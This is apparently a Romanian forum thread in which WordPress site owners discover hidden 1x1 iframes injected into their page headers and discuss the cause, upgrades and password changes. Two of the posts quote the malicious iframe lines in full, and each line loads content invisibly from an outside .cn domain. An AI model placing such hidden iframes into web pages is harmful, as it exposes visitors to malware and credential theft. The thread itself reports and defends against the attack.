-
virus sau hack?
Salut. Dimineata am incercat sa intru pe un blog personal cand am obs ca nu ma puteam loga. Dupa ce introduceam user si pass imi ramanea intr-o pagina alba.
Am gasit in sursa inserat pe prima linie in header urmatoarea linie :
Cod:
<iframe src="http://lotante.cn/in.cgi?income37" width=1 height=1 style="visibility: hidden"></iframe>
L-am scos, totul merge ok acum, dar am cautat pe net si nu am gasit nimic legat de adresa respectiva.
Voi aveti idee ce este ? Si cum a ajuns in codul de la wp?
-
-
-
Si eu am gasit respectivul cod intr-un site.
Si observ ca si alte siteuri si bloguri pe care inca nu le-am verificat in sursa au simtome ciudate :(
-
concluzia: nimic nu e gratis pe lumea asta
;)
-
Ma oftic ca am bagat de cateva ori parola pana sa ma gandesc sa ma uit in sursa :(
-
Daca link-ul respectiv are un script care colecteaza user/parola, o singura data era de ajuns sa le bagi ca sa ti le ia. Probabil ca le-ai schimbat imediat... Ai verificat sa vezi daca se mai afla si in alte pagini?
-
upgradeaza IMEDIAT la 2.7.1 daca nu vrei sa mai ai iar probleme.. seria 2.6 are cateva probleme de genu asta.. eu am avut probleme cu 2 hackuri diferite.. pana sa apara 2.7 si chiar ma gandeam serios sa trec pe TextPattern si sa renunt la Wordpress.
(si cred ca asta am sa si fac :P)
asta e problema la softuri free.. trebuie sa le updatezi continuu :P
p.s schimba toate parolele .. wordpress ftp hosting etc :D
-
Deja cred ca este de la mine.
Am descoperit acum ca a aparut si pe alt site care este facut de de la 0.
Cod:
<iframe src="http://thelotbet.cn/in.cgi?income39" width=1 height=1 style="visibility: hidden"></iframe>
M-a cam bagat in corzi ce sa zic.
Se pare ca e un troian care face chestia asta. Am gasit pe google ceva de iframe injection. Am sa va tin la curent cu ce progrese fac
-
in siteurile cu pricina ai vreun form prin care se poate introduce cod html fara a fi filtrat?